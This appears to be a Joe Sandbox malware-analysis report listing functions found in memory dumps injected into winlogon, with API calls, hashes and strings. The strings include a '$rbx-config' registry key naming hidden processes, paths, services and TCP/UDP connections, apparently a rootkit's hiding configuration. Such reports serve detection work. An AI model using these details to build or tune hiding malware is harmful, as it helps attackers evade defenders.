Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: 4bd71f118c44520fda5d2355f50583d8b46b91604126fff33060b823f2b4427d
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: 25115E21B906C382FB609763E94D39922D0B758385F52411FA416811E3EF78C6D89F71

Function 000002E991755530 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000002E991755534
VirtualProtect.KERNEL32 ref: 000002E991755577
FlushInstructionCache.KERNEL32 ref: 000002E99175558C

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: b3b9d40e5005b69779f21a3a3f4c2159e48617e69c58b355d88cafa2766b084c
Instruction ID: ae54b5527d6201f9077ce8f5f74f5325775aac870c22087e7692ff2d3c54d51a
Opcode Fuzzy Hash: b3b9d40e5005b69779f21a3a3f4c2159e48617e69c58b355d88cafa2766b084c
Instruction Fuzzy Hash: 01F03A26268B85C0D630DB07E45934AA7A1F3C8BD8F65411AFA8D47B6ACF38C2C18F10

Function 000002E991751BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002E991751724: GetProcessHeap.KERNEL32 ref: 000002E99175172F
Part of subcall function 000002E991751724: HeapAlloc.KERNEL32 ref: 000002E99175173E
Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E9917517AE
Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E9917517DB
Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E9917517F5
Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E991751815
Part of subcall function 000002E991751724: RegCloseKey.KERNELBASE ref: 000002E991751830
Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E991751850
Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E99175186B
Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E99175188B
Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E9917518A6
Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E9917518C6

SleepEx.KERNELBASE ref: 000002E991751BDF

Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E9917518E1
Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E991751901
Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E99175191C
Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E99175193C
Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E991751957
Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E991751977
Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E991751992
Part of subcall function 000002E991751724: RegCloseKey.KERNELBASE ref: 000002E99175199C

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 08ddea5e06037298be233082ecc813bccc9da343497e1d7d67a6079a4d530855
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: 47312F653806C342FB509B27D55937923A4FB44BC1F1A582B8E0B87297EF35D8D08B34

Function 000002E99175F370 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 000002E99175F390

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction ID: 13e7b84320865d9b31e569f8acddc3596c4c77e6deba9caaafb55c679f67a583
Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction Fuzzy Hash: BFD01225735581C3E300DB22D8497956368F398741FC1400AE949C2695CF7CC299CF61

Function 000002E99178F370 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 000002E99178F390

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction ID: 886f5c1ab378c0d05e7c9868e2c181318b2bc2ed936de4644c4fb46cb538a86f
Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction Fuzzy Hash: 2AD01225B71591C3E300DF22D8497966328F398702FC1400BE94A82695DF7CC299CF60

Non-executed Functions

Function 000002E991752FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000002E991753094
lstrlenW.KERNEL32 ref: 000002E9917532BE

Part of subcall function 000002E991751A30: OpenProcess.KERNEL32 ref: 000002E991751A56
Part of subcall function 000002E991751A30: K32GetModuleFileNameExW.KERNEL32 ref: 000002E991751A74
Part of subcall function 000002E991751A30: PathFindFileNameW.SHLWAPI ref: 000002E991751A83
Part of subcall function 000002E991751A30: lstrlenW.KERNEL32 ref: 000002E991751A8F
Part of subcall function 000002E991751A30: StrCpyW.SHLWAPI ref: 000002E991751AA2
Part of subcall function 000002E991751A30: CloseHandle.KERNEL32 ref: 000002E991751AB0

GetProcAddress.KERNEL32 ref: 000002E9917530A9

Part of subcall function 000002E991753F88: StrCmpNIW.SHLWAPI(?,?,?,000002E99175272F), ref: 000002E991753FA0

StrCmpNIW.SHLWAPI ref: 000002E9917530EC
lstrlenW.KERNEL32 ref: 000002E991753214

Strings

ntdll.dll, xrefs: 000002E99175308D
NtQueryObject, xrefs: 000002E99175309F
\Device\Nsi, xrefs: 000002E9917530DF

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 901aa4b36f05a76b6b4ae484e9299b70b72537bbdfdb60c69d76e30a85a141aa
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 75B18E22354AD282EB658F27D5087A9A3A4F744B84F46501FEE0993BA6DF35CDC0CB70

Function 000002E991782FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000002E991783094
lstrlenW.KERNEL32 ref: 000002E9917832BE

Part of subcall function 000002E991781A30: OpenProcess.KERNEL32 ref: 000002E991781A56
Part of subcall function 000002E991781A30: K32GetModuleFileNameExW.KERNEL32 ref: 000002E991781A74
Part of subcall function 000002E991781A30: PathFindFileNameW.SHLWAPI ref: 000002E991781A83
Part of subcall function 000002E991781A30: lstrlenW.KERNEL32 ref: 000002E991781A8F
Part of subcall function 000002E991781A30: StrCpyW.SHLWAPI ref: 000002E991781AA2
Part of subcall function 000002E991781A30: CloseHandle.KERNEL32 ref: 000002E991781AB0

GetProcAddress.KERNEL32 ref: 000002E9917830A9

Part of subcall function 000002E991783F88: StrCmpNIW.SHLWAPI(?,?,?,000002E99178272F), ref: 000002E991783FA0

StrCmpNIW.SHLWAPI ref: 000002E9917830EC
lstrlenW.KERNEL32 ref: 000002E991783214

Strings

NtQueryObject, xrefs: 000002E99178309F
\Device\Nsi, xrefs: 000002E9917830DF
ntdll.dll, xrefs: 000002E99178308D

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 28712f5269c78861175d6a405fbdd04cbb5a234239551295be649858de4bdf0c
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 1EB19B22354AD286FB648F2BD4887A9A3A4F744B84F42505BEE0953B96DF35CDC4CB70

Function 000002E9917584B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002E9917584CC
RtlCaptureContext.NTDLL ref: 000002E9917584F9
RtlLookupFunctionEntry.NTDLL ref: 000002E991758513
RtlVirtualUnwind.NTDLL ref: 000002E991758554
IsDebuggerPresent.KERNEL32 ref: 000002E9917585A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000002E9917585C5
UnhandledExceptionFilter.KERNEL32 ref: 000002E9917585D0

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: da5e7db53daeae2acb595a0c748e7def4dfc93d571fbfc65a1eff29dae58969d
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 2E315272245BC18AEB608F62E8483DD7364F784788F45402FDA4E47B99DF78C588CB20

Function 000002E9917884B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002E9917884CC
RtlCaptureContext.NTDLL ref: 000002E9917884F9
RtlLookupFunctionEntry.NTDLL ref: 000002E991788513
RtlVirtualUnwind.NTDLL ref: 000002E991788554
IsDebuggerPresent.KERNEL32 ref: 000002E9917885A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000002E9917885C5
UnhandledExceptionFilter.KERNEL32 ref: 000002E9917885D0

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 3b695e613dbd15be2a6d4b3d3f45fb4354c2d66b7e0ca5ac822997602774bf22
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 7D315072245BC186EB608F65E8843EE7364F784749F45412FDA4E47B9ADF78C588CB20

Function 000002E99175CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002E99175CE0B
RtlLookupFunctionEntry.NTDLL ref: 000002E99175CE23
RtlVirtualUnwind.NTDLL ref: 000002E99175CE5E
IsDebuggerPresent.KERNEL32 ref: 000002E99175CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000002E99175CEA1
UnhandledExceptionFilter.KERNEL32 ref: 000002E99175CEAC

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 39225dbaa60ab54407ea9405c81e92153366d86cbcf1a941c4e79b092faf822f
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 9341B436214FC186D760CF26E84839E73A4F789798F51011AEA9D87B99DF38C195CF10

Function 000002E99178CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002E99178CE0B
RtlLookupFunctionEntry.NTDLL ref: 000002E99178CE23
RtlVirtualUnwind.NTDLL ref: 000002E99178CE5E
IsDebuggerPresent.KERNEL32 ref: 000002E99178CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000002E99178CEA1
UnhandledExceptionFilter.KERNEL32 ref: 000002E99178CEAC

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 6a42c600588de03add4d48890d9448702fe8a2d3eb5308a9508b0b8b4b6a9d5f
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 01415F36254FC186E760CF26E88439E73A4F788758F51021BEA9D47B9ADF38C599CB10

Function 000002E99175DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000002E99175DB99
FindNextFileW.KERNEL32 ref: 000002E99175DCCF
FindClose.KERNEL32 ref: 000002E99175DD0F
FindClose.KERNEL32 ref: 000002E99175DD3B

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 1554a8dfa1abde21d920324e67176d06f9fd64292f37c0f1049a948324637e2a
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 72A106227647C249FB20DB77E4483AE6BA1F741BA4F15411BDE9927A9ADF38C4C1CB10

Function 000002E99178DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000002E99178DB99
FindNextFileW.KERNEL32 ref: 000002E99178DCCF
FindClose.KERNEL32 ref: 000002E99178DD0F
FindClose.KERNEL32 ref: 000002E99178DD3B

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 7cd24e4daa130da9d4b8545705f21363768520c28e30343eb656b0821046e916
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 67A12A227446C24AFB20DB77E4C83AD6BA1F7417A4F15415FDE8927A9BDA38C4C1CB20

Function 000002E991781724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002E99178172F
HeapAlloc.KERNEL32 ref: 000002E99178173E

Part of subcall function 000002E991781264: GetProcessHeap.KERNEL32 ref: 000002E99178126A
Part of subcall function 000002E991781264: HeapAlloc.KERNEL32 ref: 000002E991781279
Part of subcall function 000002E991781264: GetProcessHeap.KERNEL32 ref: 000002E991781293
Part of subcall function 000002E991781264: HeapAlloc.KERNEL32 ref: 000002E9917812A4

Part of subcall function 000002E991781000: GetProcessHeap.KERNEL32 ref: 000002E991781006
Part of subcall function 000002E991781000: HeapAlloc.KERNEL32 ref: 000002E991781015
Part of subcall function 000002E991781000: GetProcessHeap.KERNEL32 ref: 000002E991781028
Part of subcall function 000002E991781000: HeapAlloc.KERNEL32 ref: 000002E991781037

RegOpenKeyExW.ADVAPI32 ref: 000002E9917817AE
RegOpenKeyExW.ADVAPI32 ref: 000002E9917817DB
RegCloseKey.ADVAPI32 ref: 000002E9917817F5
RegOpenKeyExW.ADVAPI32 ref: 000002E991781815
RegCloseKey.ADVAPI32 ref: 000002E991781830
RegOpenKeyExW.ADVAPI32 ref: 000002E991781850
RegCloseKey.ADVAPI32 ref: 000002E99178186B
RegOpenKeyExW.ADVAPI32 ref: 000002E99178188B
RegCloseKey.ADVAPI32 ref: 000002E9917818A6
RegOpenKeyExW.ADVAPI32 ref: 000002E9917818C6
RegCloseKey.ADVAPI32 ref: 000002E9917818E1
RegOpenKeyExW.ADVAPI32 ref: 000002E991781901
RegCloseKey.ADVAPI32 ref: 000002E99178191C
RegOpenKeyExW.ADVAPI32 ref: 000002E99178193C
RegCloseKey.ADVAPI32 ref: 000002E991781957
RegOpenKeyExW.ADVAPI32 ref: 000002E991781977
RegCloseKey.ADVAPI32 ref: 000002E991781992
RegCloseKey.ADVAPI32 ref: 000002E99178199C

Part of subcall function 000002E9917812B8: RegQueryInfoKeyW.ADVAPI32 ref: 000002E991781315
Part of subcall function 000002E9917812B8: GetProcessHeap.KERNEL32 ref: 000002E991781323
Part of subcall function 000002E9917812B8: HeapAlloc.KERNEL32 ref: 000002E991781334
Part of subcall function 000002E9917812B8: RegEnumValueW.ADVAPI32 ref: 000002E991781393
Part of subcall function 000002E9917812B8: GetProcessHeap.KERNEL32 ref: 000002E9917813DB
Part of subcall function 000002E9917812B8: HeapAlloc.KERNEL32 ref: 000002E9917813E9
Part of subcall function 000002E9917812B8: GetProcessHeap.KERNEL32 ref: 000002E991781406
Part of subcall function 000002E9917812B8: HeapFree.KERNEL32 ref: 000002E991781414
Part of subcall function 000002E9917812B8: lstrlenW.KERNEL32 ref: 000002E99178141D
Part of subcall function 000002E9917812B8: GetProcessHeap.KERNEL32 ref: 000002E99178142B
Part of subcall function 000002E9917812B8: HeapAlloc.KERNEL32 ref: 000002E991781439

Strings

startup, xrefs: 000002E9917817D1
udp, xrefs: 000002E991781970
process_names, xrefs: 000002E991781849
tcp_remote, xrefs: 000002E991781935
tcp_local, xrefs: 000002E9917818FA
paths, xrefs: 000002E991781884
service_names, xrefs: 000002E9917818BF
SOFTWARE\$rbx-config, xrefs: 000002E99178178E
pid, xrefs: 000002E99178180E

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: a031a39ca682313daa7caf78874a0e988bedd57c9d87916451c15765c2fa030d
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 1A713F36350A9289EB109F37E89969D3374FB84B89F42111BDD4E57B2ADF34C488CB50

Function 000002E991781E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000002E991781E7F

